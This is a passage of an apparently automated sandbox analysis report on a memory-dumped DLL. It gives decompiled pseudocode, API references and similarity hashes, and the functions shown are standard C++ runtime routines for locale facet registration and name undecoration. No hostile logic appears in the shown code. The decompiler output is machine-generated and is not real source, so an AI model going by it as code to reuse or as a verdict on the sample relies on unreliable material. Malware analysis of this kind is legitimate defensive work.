																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t856 =  *(_t902 - 0x10);
																																																							 *(_t902 - 0x10) = _t856;
																																																							 *(_t902 - 4) = 1;
																																																							E6DDD6FD3(__eflags, _t856);
																																																							 *0x6de3a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t856 + 4))))();
																																																							 *0x6de96dfc = _t856;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t856 = _t877;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t855 =  *(_t902 - 0x10);
																																																				 *(_t902 - 0x10) = _t855;
																																																				 *(_t902 - 4) = 1;
																																																				E6DDD6FD3(__eflags, _t855);
																																																				 *0x6de3a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t855 + 4))))();
																																																				 *0x6de96de0 = _t855;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t855 = _t876;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t854 =  *(_t902 - 0x10);
																																																	 *(_t902 - 0x10) = _t854;
																																																	 *(_t902 - 4) = 1;
																																																	E6DDD6FD3(__eflags, _t854);
																																																	 *0x6de3a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t854 + 4))))();
																																																	 *0x6de96ddc = _t854;
																																																	goto L103;
																																																}
																																															} else {
																																																_t854 = _t875;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t853 =  *(_t902 - 0x10);
																																														 *(_t902 - 0x10) = _t853;
																																														 *(_t902 - 4) = 1;
																																														E6DDD6FD3(__eflags, _t853);
																																														 *0x6de3a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t853 + 4))))();
																																														 *0x6de96db0 = _t853;
																																														goto L96;
																																													}
																																												} else {
																																													_t853 = _t874;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t852 =  *(_t902 - 0x10);
																																											 *(_t902 - 0x10) = _t852;
																																											 *(_t902 - 4) = 1;
																																											E6DDD6FD3(__eflags, _t852);
																																											 *0x6de3a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t852 + 4))))();
																																											 *0x6de96dd8 = _t852;
																																											goto L89;
																																										}
																																									} else {
																																										_t852 = _t873;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t851 =  *(_t902 - 0x10);
																																								 *(_t902 - 0x10) = _t851;
																																								 *(_t902 - 4) = 1;
																																								E6DDD6FD3(__eflags, _t851);
																																								 *0x6de3a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t851 + 4))))();
																																								 *0x6de96dc4 = _t851;
																																								goto L82;
																																							}
																																						} else {
																																							_t851 = _t872;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t850 =  *(_t902 - 0x10);
																																					 *(_t902 - 0x10) = _t850;
																																					 *(_t902 - 4) = 1;
																																					E6DDD6FD3(__eflags, _t850);
																																					 *0x6de3a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t850 + 4))))();
																																					 *0x6de96dc8 = _t850;
																																					goto L75;
																																				}
																																			} else {
																																				_t850 = _t871;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t849 =  *(_t902 - 0x10);
																																		 *(_t902 - 0x10) = _t849;
																																		 *(_t902 - 4) = 1;
																																		E6DDD6FD3(__eflags, _t849);
																																		 *0x6de3a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t849 + 4))))();
																																		 *0x6de96df4 = _t849;
																																		goto L68;
																																	}
																																} else {
																																	_t849 = _t870;
																																	goto L68;
																																}
																															}
																														} else {
																															_t848 =  *(_t902 - 0x10);
																															 *(_t902 - 0x10) = _t848;
																															 *(_t902 - 4) = 1;
																															E6DDD6FD3(__eflags, _t848);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t848 + 4))))();
																															 *0x6de96df8 = _t848;
																															goto L61;
																														}
																													} else {
																														_t848 = _t869;
																														goto L61;
																													}
																												}
																											} else {
																												_t847 =  *(_t902 - 0x10);
																												 *(_t902 - 0x10) = _t847;
																												 *(_t902 - 4) = 1;
																												E6DDD6FD3(__eflags, _t847);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t847 + 4))))();
																												 *0x6de96dc0 = _t847;
																												goto L54;
																											}
																										} else {
																											_t847 = _t868;
																											goto L54;
																										}
																									}
																								} else {
																									_t846 =  *(_t902 - 0x10);
																									 *(_t902 - 0x10) = _t846;
																									 *(_t902 - 4) = 1;
																									E6DDD6FD3(__eflags, _t846);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t846 + 4))))();
																									 *0x6de96df0 = _t846;
																									goto L47;
																								}
																							} else {
																								_t846 = _t867;
																								goto L47;
																							}
																						}
																					} else {
																						_t845 =  *(_t902 - 0x10);
																						 *(_t902 - 0x10) = _t845;
																						 *(_t902 - 4) = 1;
																						E6DDD6FD3(__eflags, _t845);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t845 + 4))))();
																						 *0x6de96dbc = _t845;
																						goto L40;
																					}
																				} else {
																					_t845 = _t866;
																					goto L40;
																				}
																			}
																		} else {
																			_t844 =  *(_t902 - 0x10);
																			 *(_t902 - 0x10) = _t844;
																			 *(_t902 - 4) = 1;
																			E6DDD6FD3(__eflags, _t844);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t844 + 4))))();
																			 *0x6de96dec = _t844;
																			goto L33;
																		}
																	} else {
																		_t844 = _t865;
																		goto L33;
																	}
																}
															} else {
																_t843 =  *(_t902 - 0x10);
																 *(_t902 - 0x10) = _t843;
																 *(_t902 - 4) = 1;
																E6DDD6FD3(__eflags, _t843);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t843 + 4))))();
																 *0x6de96db8 = _t843;
																goto L26;
															}
														} else {
															_t843 = _t864;
															goto L26;
														}
													}
												} else {
													_t842 =  *(_t902 - 0x10);
													 *(_t902 - 0x10) = _t842;
													 *(_t902 - 4) = 1;
													E6DDD6FD3(__eflags, _t842);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t842 + 4))))();
													 *0x6de96de8 = _t842;
													goto L19;
												}
											} else {
												_t842 = _t863;
												goto L19;
											}
										}
									} else {
										_t841 =  *(_t902 - 0x10);
										 *(_t902 - 0x10) = _t841;
										 *(_t902 - 4) = 1;
										E6DDD6FD3(__eflags, _t841);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t841 + 4))))();
										 *0x6de96dd4 = _t841;
										goto L12;
									}
								} else {
									_t841 = _t862;
									goto L12;
								}
							}
						} else {
							_t840 =  *(_t902 - 0x10);
							 *(_t902 - 0x10) = _t840;
							 *(_t902 - 4) = 1;
							E6DDD6FD3(__eflags, _t840);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t840 + 4))))();
							 *0x6de96db4 = _t840;
							goto L5;
						}
					} else {
						_t840 = _t861;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDF03E
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF048
int.LIBCPMT ref: 6DDDF05F

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

collate.LIBCPMT ref: 6DDDF082
std::_Facet_Register.LIBCPMT ref: 6DDDF099
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF0B9
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF0D7

Strings

hmm, xrefs: 6DDDF053

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID: hmm
API String ID: 2363045490-380746299
Opcode ID: a6a72c08aca1b97b7a803e36dcce9ec86645bb9cbcfdf25329adfd53ad0c3427
Instruction ID: 116d0f0a26a9bc06059bf3de1f7f852bc0d449ff607af5d545ac86e01f110632
Opcode Fuzzy Hash: a6a72c08aca1b97b7a803e36dcce9ec86645bb9cbcfdf25329adfd53ad0c3427
Instruction Fuzzy Hash: 8411C276849519DBCF01FB64C840BFDB7B5AF94318F260009F511AB294DF74AA01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDF735D, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DDF735D(void* __eflags, signed int* _a4) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				intOrPtr _t17;
				intOrPtr* _t20;
				void* _t22;
				void* _t25;
				signed int* _t30;
				intOrPtr* _t33;
				void* _t42;

				E6DDF5A6C( &_v12, E6DDF614D(0));
				_t33 =  *0x6de97218; // 0x0
				_t17 =  *_t33;
				if(_t17 == 0) {
					E6DDF6052( &_v12, 1);
					goto L8;
				} else {
					 *0x6de97218 = _t33 + 1;
					_t22 = _t17 - 0x30;
					if(_t22 == 0) {
						E6DDF5FF1( &_v12, "void");
						goto L8;
					} else {
						_t25 = _t22;
						if(_t25 == 0) {
							E6DDF5EFB( &_v12, E6DDF9DB3(_t42, __eflags,  &_v20));
							goto L8;
						} else {
							if(_t25 != 3) {
								L8:
								E6DDF5FF1( &_v12, ") ");
								_t20 = _a4;
								 *_t20 = _v12;
								 *((intOrPtr*)(_t20 + 4)) = _v8;
								return _t20;
							} else {
								_t30 = _a4;
								_t30[1] = _t30[1] & 0x00000000;
								 *_t30 =  *_t30 & 0x00000000;
								_t30[1] = 2;
								return _t30;
							}
						}
					}
				}
			}

0x6ddf736f
0x6ddf7374
0x6ddf737a
0x6ddf737e
0x6ddf73d3
0x00000000
0x6ddf7380
0x6ddf7384
0x6ddf738a
0x6ddf738d
0x6ddf73c7
0x00000000
0x6ddf738f
0x6ddf7390
0x6ddf7393
0x6ddf73b8
0x00000000
0x6ddf7395
0x6ddf7398
0x6ddf73d8
0x6ddf73e0
0x6ddf73e5
0x6ddf73eb
0x6ddf73f0
0x6ddf73f4
0x6ddf739a
0x6ddf739a
0x6ddf739d
0x6ddf73a1
0x6ddf73a4
0x6ddf73a9
0x6ddf73a9
0x6ddf7398
0x6ddf7393
0x6ddf738d

APIs

UnDecorator::UScore.LIBVCRUNTIME ref: 6DDF7365
DName::DName.LIBVCRUNTIME ref: 6DDF736F

Part of subcall function 6DDF5A6C: DName::doPchar.LIBVCRUNTIME ref: 6DDF5A93

UnDecorator::getScopedName.LIBVCRUNTIME ref: 6DDF73AE
DName::operator+=.LIBVCRUNTIME ref: 6DDF73B8
DName::operator+=.LIBCMT ref: 6DDF73C7
DName::operator+=.LIBCMT ref: 6DDF73D3
DName::operator+=.LIBCMT ref: 6DDF73E0

Strings

void, xrefs: 6DDF73BF

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID: void
API String ID: 1480779885-3531332078
Opcode ID: 1ac270657fbecc1a07b8d448ac382aff2281dfa9d06adcbab14fd325b488f424
Instruction ID: 37824b1e75070c705ebac65d66eb89a8968916604cc0f6c5fd83d00c25f87623
Opcode Fuzzy Hash: 1ac270657fbecc1a07b8d448ac382aff2281dfa9d06adcbab14fd325b488f424
Instruction Fuzzy Hash: ED117C75C04249BADB04EF64C854BFCBBB4AB01318F128199F9519B692DB70AA46CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF229, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDF229(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t251;
				signed int _t252;
				void* _t264;
				void* _t277;
				void* _t290;
				void* _t303;
				void* _t316;
				void* _t329;
				void* _t342;
				void* _t355;
				void* _t368;
				void* _t381;
				void* _t394;
				void* _t407;
				void* _t420;
				void* _t433;
				void* _t446;
				void* _t459;
				signed int _t663;
				signed int _t718;
				signed int _t719;
				signed int _t720;
				signed int _t721;
				signed int _t722;
				signed int _t723;
				signed int _t724;
				signed int _t725;
				signed int _t726;
				signed int _t727;
				signed int _t728;
				signed int _t729;
				signed int _t730;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t735;
				signed int _t736;
				signed int _t737;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				signed int _t746;
				signed int _t747;
				signed int _t748;
				signed int _t749;
				signed int _t750;
				signed int _t751;
				signed int _t752;
				void* _t770;

				_t715 = __edx;
				_t544 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t770 - 0x14, 0);
				_t735 =  *0x6de96db8; // 0x0
				 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
				 *(_t770 - 0x10) = _t735;
				_t251 = E6DDB161C(0x6de96d6c);
				_t547 =  *((intOrPtr*)(_t770 + 8));
				_t252 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t251);
				_t717 = _t252;
				if(_t252 != 0) {
					L5:
					E6DDD66BA(_t770 - 0x14);
					return E6DDF0075(_t717);
				} else {
					if(_t735 == 0) {
						_push( *((intOrPtr*)(_t770 + 8)));
						_push(_t770 - 0x10);
						__eflags = E6DDE0F1F(__ebx, _t547, __edx, _t717, _t735) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t770 - 0x20);
							E6DDF3D74(_t770 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t717, _t735, 0x14);
							E6DDD6653(_t770 - 0x14, 0);
							_t736 =  *0x6de96dec; // 0x0
							 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
							 *(_t770 - 0x10) = _t736;
							_t264 = E6DDB161C(0x6de96d98);
							_t554 =  *((intOrPtr*)(_t770 + 8));
							_t718 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t264);
							__eflags = _t718;
							if(_t718 != 0) {
								L12:
								E6DDD66BA(_t770 - 0x14);
								return E6DDF0075(_t718);
							} else {
								__eflags = _t736;
								if(_t736 == 0) {
									_push( *((intOrPtr*)(_t770 + 8)));
									_push(_t770 - 0x10);
									__eflags = E6DDE0F87(_t544, _t554, __edx, _t718, _t736) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t770 - 0x20);
										E6DDF3D74(_t770 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t544, _t718, _t736, 0x14);
										E6DDD6653(_t770 - 0x14, 0);
										_t737 =  *0x6de96dbc; // 0x0
										 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
										 *(_t770 - 0x10) = _t737;
										_t277 = E6DDB161C(0x6de96d70);
										_t561 =  *((intOrPtr*)(_t770 + 8));
										_t719 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t277);
										__eflags = _t719;
										if(_t719 != 0) {
											L19:
											E6DDD66BA(_t770 - 0x14);
											return E6DDF0075(_t719);
										} else {
											__eflags = _t737;
											if(_t737 == 0) {
												_push( *((intOrPtr*)(_t770 + 8)));
												_push(_t770 - 0x10);
												__eflags = E6DDE0FEF(_t544, _t561, __edx, _t719, _t737) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t770 - 0x20);
													E6DDF3D74(_t770 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t544, _t719, _t737, 0x14);
													E6DDD6653(_t770 - 0x14, 0);
													_t738 =  *0x6de96df0; // 0x0
													 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
													 *(_t770 - 0x10) = _t738;
													_t290 = E6DDB161C(0x6de96d9c);
													_t568 =  *((intOrPtr*)(_t770 + 8));
													_t720 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t290);
													__eflags = _t720;
													if(_t720 != 0) {
														L26:
														E6DDD66BA(_t770 - 0x14);
														return E6DDF0075(_t720);
													} else {
														__eflags = _t738;
														if(_t738 == 0) {
															_push( *((intOrPtr*)(_t770 + 8)));
															_push(_t770 - 0x10);
															__eflags = E6DDE1057(_t544, _t568, _t715, _t720, _t738) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t770 - 0x20);
																E6DDF3D74(_t770 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t544, _t720, _t738, 0x14);
																E6DDD6653(_t770 - 0x14, 0);
																_t739 =  *0x6de96dc0; // 0x0
																 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																 *(_t770 - 0x10) = _t739;
																_t303 = E6DDB161C(0x6de96d74);
																_t575 =  *((intOrPtr*)(_t770 + 8));
																_t721 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t303);
																__eflags = _t721;
																if(_t721 != 0) {
																	L33:
																	E6DDD66BA(_t770 - 0x14);
																	return E6DDF0075(_t721);
																} else {
																	__eflags = _t739;
																	if(_t739 == 0) {
																		_push( *((intOrPtr*)(_t770 + 8)));
																		_push(_t770 - 0x10);
																		__eflags = E6DDE10BF(_t544, _t575, _t715, _t721, _t739) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t770 - 0x20);
																			E6DDF3D74(_t770 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t544, _t721, _t739, 0x14);
																			E6DDD6653(_t770 - 0x14, 0);
																			_t740 =  *0x6de96df8; // 0x0
																			 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																			 *(_t770 - 0x10) = _t740;
																			_t316 = E6DDB161C(0x6de96da4);
																			_t582 =  *((intOrPtr*)(_t770 + 8));
																			_t722 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t316);
																			__eflags = _t722;
																			if(_t722 != 0) {
																				L40:
																				E6DDD66BA(_t770 - 0x14);
																				return E6DDF0075(_t722);
																			} else {
																				__eflags = _t740;
																				if(_t740 == 0) {
																					_push( *((intOrPtr*)(_t770 + 8)));
																					_push(_t770 - 0x10);
																					__eflags = E6DDE1127(_t544, _t582, _t715, _t722, _t740) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t770 - 0x20);
																						E6DDF3D74(_t770 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t544, _t722, _t740, 0x14);
																						E6DDD6653(_t770 - 0x14, 0);
																						_t741 =  *0x6de96df4; // 0x0
																						 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																						 *(_t770 - 0x10) = _t741;
																						_t329 = E6DDB161C(0x6de96da0);
																						_t589 =  *((intOrPtr*)(_t770 + 8));
																						_t723 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t329);
																						__eflags = _t723;
																						if(_t723 != 0) {
																							L47:
																							E6DDD66BA(_t770 - 0x14);
																							return E6DDF0075(_t723);
																						} else {
																							__eflags = _t741;
																							if(_t741 == 0) {
																								_push( *((intOrPtr*)(_t770 + 8)));
																								_push(_t770 - 0x10);
																								__eflags = E6DDE11AB(_t544, _t589, _t715, _t723, _t741) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t770 - 0x20);
																									E6DDF3D74(_t770 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t544, _t723, _t741, 0x14);
																									E6DDD6653(_t770 - 0x14, 0);
																									_t742 =  *0x6de96dc8; // 0x0
																									 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																									 *(_t770 - 0x10) = _t742;
																									_t342 = E6DDB161C(0x6de96d7c);
																									_t596 =  *((intOrPtr*)(_t770 + 8));
																									_t724 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t342);
																									__eflags = _t724;
																									if(_t724 != 0) {
																										L54:
																										E6DDD66BA(_t770 - 0x14);
																										return E6DDF0075(_t724);
																									} else {
																										__eflags = _t742;
																										if(_t742 == 0) {
																											_push( *((intOrPtr*)(_t770 + 8)));
																											_push(_t770 - 0x10);
																											__eflags = E6DDE1230(_t544, _t596, _t715, _t724, _t742) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t770 - 0x20);
																												E6DDF3D74(_t770 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t544, _t724, _t742, 0x14);
																												E6DDD6653(_t770 - 0x14, 0);
																												_t743 =  *0x6de96dc4; // 0x0
																												 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																												 *(_t770 - 0x10) = _t743;
																												_t355 = E6DDB161C(0x6de96d78);
																												_t603 =  *((intOrPtr*)(_t770 + 8));
																												_t725 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t355);
																												__eflags = _t725;
																												if(_t725 != 0) {
																													L61:
																													E6DDD66BA(_t770 - 0x14);
																													return E6DDF0075(_t725);
																												} else {
																													__eflags = _t743;
																													if(_t743 == 0) {
																														_push( *((intOrPtr*)(_t770 + 8)));
																														_push(_t770 - 0x10);
																														__eflags = E6DDE12B4(_t544, _t603, _t715, _t725, _t743) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t770 - 0x20);
																															E6DDF3D74(_t770 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t544, _t725, _t743, 0x14);
																															E6DDD6653(_t770 - 0x14, 0);
																															_t744 =  *0x6de96dd8; // 0x0
																															 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																															 *(_t770 - 0x10) = _t744;
																															_t368 = E6DDB161C(0x6de96d84);
																															_t610 =  *((intOrPtr*)(_t770 + 8));
																															_t726 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t368);
																															__eflags = _t726;
																															if(_t726 != 0) {
																																L68:
																																E6DDD66BA(_t770 - 0x14);
																																return E6DDF0075(_t726);
																															} else {
																																__eflags = _t744;
																																if(_t744 == 0) {
																																	_push( *((intOrPtr*)(_t770 + 8)));
																																	_push(_t770 - 0x10);
																																	__eflags = E6DDE1339(_t544, _t610, _t715, _t726, _t744) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6DDB1438(_t770 - 0x20);
																																		E6DDF3D74(_t770 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de383cf, _t544, _t726, _t744, 0x14);
																																		E6DDD6653(_t770 - 0x14, 0);
																																		_t745 =  *0x6de96db0; // 0x0
																																		 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																		 *(_t770 - 0x10) = _t745;
																																		_t381 = E6DDB161C(0x6de96d64);
																																		_t617 =  *((intOrPtr*)(_t770 + 8));
																																		_t727 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t381);
																																		__eflags = _t727;
																																		if(_t727 != 0) {
																																			L75:
																																			E6DDD66BA(_t770 - 0x14);
																																			return E6DDF0075(_t727);
																																		} else {
																																			__eflags = _t745;
																																			if(_t745 == 0) {
																																				_push( *((intOrPtr*)(_t770 + 8)));
																																				_push(_t770 - 0x10);
																																				__eflags = E6DDE13A1(_t544, _t617, _t715, _t727, _t745) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6DDB1438(_t770 - 0x20);
																																					E6DDF3D74(_t770 - 0x20, 0x6de93504);
																																					asm("int3");
																																					E6DDF00AC(0x6de383cf, _t544, _t727, _t745, 0x14);
																																					E6DDD6653(_t770 - 0x14, 0);
																																					_t746 =  *0x6de96ddc; // 0x0
																																					 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																					 *(_t770 - 0x10) = _t746;
																																					_t394 = E6DDB161C(0x6de96d88);
																																					_t624 =  *((intOrPtr*)(_t770 + 8));
																																					_t728 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t394);
																																					__eflags = _t728;
																																					if(_t728 != 0) {
																																						L82:
																																						E6DDD66BA(_t770 - 0x14);
																																						return E6DDF0075(_t728);
																																					} else {
																																						__eflags = _t746;
																																						if(_t746 == 0) {
																																							_push( *((intOrPtr*)(_t770 + 8)));
																																							_push(_t770 - 0x10);
																																							__eflags = E6DDE1409(_t544, _t624, _t715, _t728, _t746) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6DDB1438(_t770 - 0x20);
																																								E6DDF3D74(_t770 - 0x20, 0x6de93504);
																																								asm("int3");
																																								E6DDF00AC(0x6de383cf, _t544, _t728, _t746, 0x14);
																																								E6DDD6653(_t770 - 0x14, 0);
																																								_t747 =  *0x6de96de0; // 0x0
																																								 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																								 *(_t770 - 0x10) = _t747;
																																								_t407 = E6DDB161C(0x6de96d8c);
																																								_t631 =  *((intOrPtr*)(_t770 + 8));
																																								_t729 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t407);
																																								__eflags = _t729;
																																								if(_t729 != 0) {
																																									L89:
																																									E6DDD66BA(_t770 - 0x14);
																																									return E6DDF0075(_t729);
																																								} else {
																																									__eflags = _t747;
																																									if(_t747 == 0) {
																																										_push( *((intOrPtr*)(_t770 + 8)));
																																										_push(_t770 - 0x10);
																																										__eflags = E6DDE1471(_t544, _t631, _t715, _t729, _t747) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6DDB1438(_t770 - 0x20);
																																											E6DDF3D74(_t770 - 0x20, 0x6de93504);
																																											asm("int3");
																																											E6DDF00AC(0x6de383cf, _t544, _t729, _t747, 0x14);
																																											E6DDD6653(_t770 - 0x14, 0);
																																											_t748 =  *0x6de96dfc; // 0x0
																																											 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																											 *(_t770 - 0x10) = _t748;
																																											_t420 = E6DDB161C(0x6de96da8);
																																											_t638 =  *((intOrPtr*)(_t770 + 8));
																																											_t730 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t420);
																																											__eflags = _t730;
																																											if(_t730 != 0) {
																																												L96:
																																												E6DDD66BA(_t770 - 0x14);
																																												return E6DDF0075(_t730);
																																											} else {
																																												__eflags = _t748;
																																												if(_t748 == 0) {
																																													_push( *((intOrPtr*)(_t770 + 8)));
																																													_push(_t770 - 0x10);
																																													__eflags = E6DDE14EC(_t544, _t638, _t715, _t730, _t748) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6DDB1438(_t770 - 0x20);
																																														E6DDF3D74(_t770 - 0x20, 0x6de93504);
																																														asm("int3");
																																														E6DDF00AC(0x6de383cf, _t544, _t730, _t748, 0x14);
																																														E6DDD6653(_t770 - 0x14, 0);
																																														_t749 =  *0x6de96dcc; // 0x0
																																														 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																														 *(_t770 - 0x10) = _t749;
																																														_t433 = E6DDB161C(0x6de96d80);
																																														_t645 =  *((intOrPtr*)(_t770 + 8));
																																														_t731 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t433);
																																														__eflags = _t731;
																																														if(_t731 != 0) {
																																															L103:
																																															E6DDD66BA(_t770 - 0x14);
																																															return E6DDF0075(_t731);
																																														} else {
																																															__eflags = _t749;
																																															if(_t749 == 0) {
																																																_push( *((intOrPtr*)(_t770 + 8)));
																																																_push(_t770 - 0x10);
																																																__eflags = E6DDE1558(_t544, _t645, _t715, _t731, _t749) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6DDB1438(_t770 - 0x20);
																																																	E6DDF3D74(_t770 - 0x20, 0x6de93504);
																																																	asm("int3");
																																																	E6DDF00AC(0x6de383cf, _t544, _t731, _t749, 0x14);
																																																	E6DDD6653(_t770 - 0x14, 0);
																																																	_t750 =  *0x6de96e00; // 0x0
																																																	 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																																	 *(_t770 - 0x10) = _t750;
																																																	_t446 = E6DDB161C(0x6de96dac);
																																																	_t652 =  *((intOrPtr*)(_t770 + 8));
																																																	_t732 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t446);
																																																	__eflags = _t732;
																																																	if(_t732 != 0) {
																																																		L110:
																																																		E6DDD66BA(_t770 - 0x14);
																																																		return E6DDF0075(_t732);
																																																	} else {
																																																		__eflags = _t750;
																																																		if(_t750 == 0) {
																																																			_push( *((intOrPtr*)(_t770 + 8)));
																																																			_push(_t770 - 0x10);
																																																			__eflags = E6DDE15C4(_t544, _t652, _t715, _t732, _t750) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6DDB1438(_t770 - 0x20);
																																																				E6DDF3D74(_t770 - 0x20, 0x6de93504);
																																																				asm("int3");
																																																				E6DDF00AC(0x6de383cf, _t544, _t732, _t750, 0x14);
																																																				E6DDD6653(_t770 - 0x14, 0);
